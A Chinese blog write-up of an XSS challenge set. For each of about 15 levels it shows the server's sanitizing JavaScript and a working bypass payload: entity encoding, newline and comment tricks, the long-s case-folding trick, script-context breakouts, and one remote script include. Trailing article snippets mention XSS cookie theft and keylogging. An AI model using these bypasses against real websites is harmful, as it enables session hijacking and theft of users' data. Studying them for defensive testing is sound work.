xss实战-------要点记录

最新推荐文章于 2025-07-21 01:15:00 发布
原创 最新推荐文章于 2025-07-21 01:15:00 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客详细记录了XSS实战中的多种过滤策略,包括()过滤、HTML注释问题、标签内on/auto字段过滤、尖括号过滤、style标签XSS、src属性限定等,并探讨了各种绕过方法,如编码、换行、事件利用等。

一、过滤()`

1.()被过滤

服务端代码

function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

由于()被过滤,考虑编码绕过。

攻击代码

<iframe onmouseover=javascript:alert&#40;&#49;&#41;>

2.html 注释问题

a.服务端代码

function render (input) {
  input = input.replace(/-->/g, '?')
  return '<!-- ' + input + ' -->'
}

b.攻击代码

–>以及–!>均可结束注释

---!><script>alert(1)</script>

3.标签内过滤on/auto开头字段及尖括号>

a.服务端代码

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

b.攻击代码

通过换行避开正则。

type="image" src="xx" onmouseover
="alert(1)"

4.过滤</,<

a.服务端代码

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

b.攻击代码

考虑到尖括号<>成对会被闭合,根据情况,可以省写>。

<iframe onmouseover=javascript:alert(1)

5.style标签内XSS

a.服务端代码

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}

b.攻击代码

由于正常闭合会被编码,考虑避开正则。

</style
>
<script>alert(1)</script>

6 src限定

a.服务端代码

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

b.攻击代码

限定尾部未要求,考虑闭合标签

https://www.segmentfault.com"></script><script>alert(1)//

7.&’ " < > \均被编码

a.服务端代码并限定url

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

b.攻击代码

考虑外部引入(个人未解出)

https://www.segmentfault.com@xx.xx.xx.xx/1.html

8. 大写绕过

a.服务端代码

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

b.攻击代码

考虑编码—+ 

<svg><script>&#97;&#108;&#101;&#114;&#116;(1)</script>

html标签 , 域名 不区分大小写.

<script src="data:text/javascript,&#97;&#108;&#101;&#114;&#116;(1)"></script>

<script src="https://xss.haozi.me/j.js"></script>

9 过滤大小写,script

a.服务端代码

function render (input) {
  input = input.replace(/script/ig, '')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

b.攻击代码

考虑on事件+编码

<iframe onmouseover=&#97;&#108;&#101;&#114;&#116;(1)>

10. </" ’ 过滤

a.服务端代码

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}

b.攻击代码

考虑// 仅仅是单行注释。换行绕过。 -->在JS中可以注释一行

alert(1)
-->

11.标签首字母被编码并大写

a.服务端代码

function render (input) {
  input = input.replace(/<([a-zA-Z])/g, '<_$1')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

b.攻击代码

完全没想到,给跪了。拉丁文。ſ----s小写。

<ſvg>
<ſcript>&#97;&#108;&#101;&#114;&#116;(1)</ſcript>

12.& ‘ " < > \过滤

a.服务端代码

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src onerror="console.error('${escapeHtml(input)}')">`
}

b.攻击代码

由于img标签内先html解析,后url解析,有处理但没用。

');alert(1)//

13.

a.服务端代码

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}

b.攻击代码

无过滤

alert(1)

14," ’ / < > 各种空白符过滤

a.服务端代码

function render (s) {
  function escapeJs (s) {
    return String(s)
            .replace(/\\/g, '\\\\')
            .replace(/'/g, '\\\'')
            .replace(/"/g, '\\"')
            .replace(/`/g, '\\`')
            .replace(/</g, '\\74')
            .replace(/>/g, '\\76')
            .replace(/\//g, '\\/')
            .replace(/\n/g, '\\n')
            .replace(/\r/g, '\\r')
            .replace(/\t/g, '\\t')
            .replace(/\f/g, '\\f')
            .replace(/\v/g, '\\v')
            // .replace(/\b/g, '\\b')
            .replace(/\0/g, '\\0')
  }
  s = escapeJs(s)
  return `
<script>
  var url = 'javascript:console.log("${s}")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>
`
}

b.攻击代码

由于仅仅是多斜杆式处理,”与"实际闭合没区别。

");alert(1)//

结果:

<script>
  var url = 'javascript:console.log("\");alert(1)\/\/")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>

15.JS处理 "

a.服务端代码

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}

b.攻击代码

考虑闭合,由于反斜杠存在 console.log中,因此闭合原标签。

1");
</script><script>alert(1);
//
逻辑漏洞挖掘之XSS漏洞原理分析及实战演练
yj520400的博客
03-22 1401
2月份的1.2亿条用户地址信息泄露再次给各大公司敲响了警钟,数据安全的重要性愈加凸显,这也更加坚定了我们推行安全测试常态化的决心。随着测试组安全测试常态化的推进,有更多的同事对逻辑漏洞产生了兴趣,本系列文章旨在揭秘逻辑漏洞的范围、原理及预防措施,逐步提升大家的安全意识。作为开篇第一章,本文选取了广为熟知的XSS逻辑漏洞进行介绍。1.XSS漏洞的定义跨站脚本(Cross Site Script),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本缩写为XSS
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
XSS靶场练习 https://xss.haozi.me
Reset
05-07 3889
https://xss.haozi.me 找到输入内容的输出点,确定是在html中还是js中。 0x00 function render (input) { return '<div>' + input + '</div>' } 在标签内且无过滤。 <script>alert(1)</script> ...
xss实战
kukudeshuo的博客
03-05 941
xss实战(利用beef渗透框架) beef介绍 BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具 实验环境 kalilinux(192.168.8.133) win10专业版(10.61.248.249) win7旗舰版(192.168.8.137) OWASP Broken Web Apps VM v1.2(192.168.8.135) 利用xss漏洞 打开kalilinux,在终端输入beef-xss打开beef工具 我们使用win10作为攻击机进入到OWASP Broken We
XSS攻防实战(附JS源码)
我本可以容忍阳光,如果我不曾见过太阳,然而阳光已使我荒凉,成为更新的荒凉。
09-07 1181
授权转载自:乔珂力https://juejin.im/post/6867184627393265677之前写过两篇文章分别介绍了 Cookie :https://juejin.im/p...
XSS通关实战
m0_55563900的博客
03-10 466
XSS基础 跨站脚本(Cross -Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能层到很高的权限(如执行一些操作)、 私密网页内容、 会话和cookie等各种内容。 XSS攻击可以分为三种:反射型、存储型和DOM型。 反射型 反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。、 攻击方式:攻击者通过电子邮件等方式将包
XSS攻击实战
qq_44915227的博客
04-18 2973
XSS攻击全程跨站脚本攻击。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。与SQL注入类似,XSS也是利用提交恶意信息来实现攻击,但是XSS一般提交的是JavaScript脚本,运行在Web端,就是用户的浏览器。SQL注入提交的SQL命令在后台的数据库服务器执行。
XSS项目实战
qq_68389880的博客
08-17 1129
innerText函数会将'<','>'进行实体编码转义;ok传入了,但是后面的函数值被删掉了,这是因为javascript对于DOMPurify框架来说是黑名单,我们需要找到这个框架对应的白名单;过滤了'(' ')' '`' '\';过滤了alert函数,可以选择切换为confirm函数,但是意义不大;这道题过滤了'<''>';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';
xss靶场实战(xss-labs-master靶场)
liushaojiax的博客
02-25 1515
,使用链接标签中的javascript:伪协议来执行 JS 代码,点击插入的链接便会弹窗。修改 url 地址中的name=<script>alert(1)
跨站脚本攻击(XSS)测试实战
测试者家园
07-21 1070
为什么 XSS 久攻不下?一个核心原因是:它依赖于用户输入的复杂上下文语义,导致传统测试机制、编码规范难以完全覆盖。 本文从攻击原理、漏洞类型、测试技术、实战流程、工具使用与自动化集成、XSS防护机制评估六大方面,深入解析 XSS 的攻防之道,旨在帮助开发、安全测试人员建立一套实战导向的思维框架与测试体系。
实战 | 记某个有趣的xss挖掘之旅
Sp4rkW的博客
03-23 1844
最近某次挖洞的过程中遇到一个非常有意思xss记录一下与大家分享,全文已脱敏 目录速览存在xss的可疑点走出去走回来 存在xss的可疑点 测试时某被动扫描器打到了一个疑似xss的点 随手掏万能验证payloadconsole.log(111),但是.被转换成了_,空格也被转换成了_ 空格通过注释/**/解决问题,但最大的问题还是在于.被拦截了 各种编码尝试一波,无果,开始尝试诸如alert,...
XSS实战训练————XSS小游戏闯关录(上)
Fly_鹏程万里
12-12 2821
前言 xss是渗透测试当中常见的一种漏洞类型,在平时的测试过程我们也会遇到不少的xss脆弱性测试点,挖掘不少的xss漏洞,但是有时候同样的测试点,你挖不到,别人却可以挖到,那么是为什么呢?基本上是由以下两个原因导致: 自我对xss理解不够全面或深入 自我的xss技巧不深 本系列文章将会通过以下XSS游戏小平台来和大家一起“XSS”! 注:为了方便查看源代码,以及对xss利用的说明解析,笔者...
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战
m0_67844671的博客
10-05 5889
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
实例演示——————简单演示XSS store攻击,便于学习理解XSS store
longger_lee
03-09 2360
此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。 一,环境搭建      1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。      2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者
一篇文章精通 XSS并学会实战挖漏洞(8000 字深度版)
lshen12345678的博客
03-24 734
攻击侧基于 AI 的 Payload 生成工具(如 GPT-XSS)针对 WebRTC 等新 API 的 XSS 漏洞防御侧基于机器学习的输入检测模型浏览器内置的 Trust Tokens 机制XSS 的本质是数据与代码的身份混淆,掌握其核心在于理解 “在浏览器中,一切皆可执行”。通过持续实战和跟踪前沿技术,白帽黑客可以在攻防对抗中始终占据主动。附录:常用 Payload 速查表场景Payload基础弹窗窃取 Cookie突破过滤(字母)DOM 型 XSS(哈希)自动提交表单。
XSS攻击(跨站脚本攻击)详解与实战
佛系摆烂
02-17 1246
是一种通过向网页注入恶意脚本(JavaScript、HTML等),在用户浏览器中执行的攻击方式。攻击者可窃取用户Cookie、会话令牌,甚至控制用户浏览器行为。
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 7979
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
XSS原理+DOMXSS实战
weixin_46128614的博客
03-22 1596
1. XSS成因 用户在客户端输入一个内容,服务端收到这个内容,并把它嵌入网页再返回给用户,这是一个常见的功能。如果用户输入的这个内容是一段精心构造的js代码,服务端恰好没有过滤,那返回的js就会被浏览器执行。 2. XSS分类 2.1 反射型 常见把js构造在URL中,然后引导其他人点击这个恶意URL,造成反射型XSS 2.2 存储型 把恶意的js发送到服务端并存储,以后其他用户每次浏览页...
CTF 中的 XSS 攻击:原理、技巧与实战案例
weixin_62428445的博客
03-04 2074
XSS 攻击指的是攻击者通过在 Web 页面中注入恶意 JavaScript 代码,使得这些代码在其他用户的浏览器中执行。通过这种方式,攻击者可以篡改页面内容、窃取用户 Cookie、劫持用户会话,甚至对用户进行钓鱼攻击。
xss-lab-master通关总结
最新发布
09-10
准备这样组织回复:先强调XSS定义避免混淆(引用[1][3]都提到CSS命名的特殊性),然后分三个实战模块:前端绕过技巧(对应引用[4]的编码技巧)、后端源码审计(引用[2]的str11参数分析)、漏洞防护要点。payload示例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值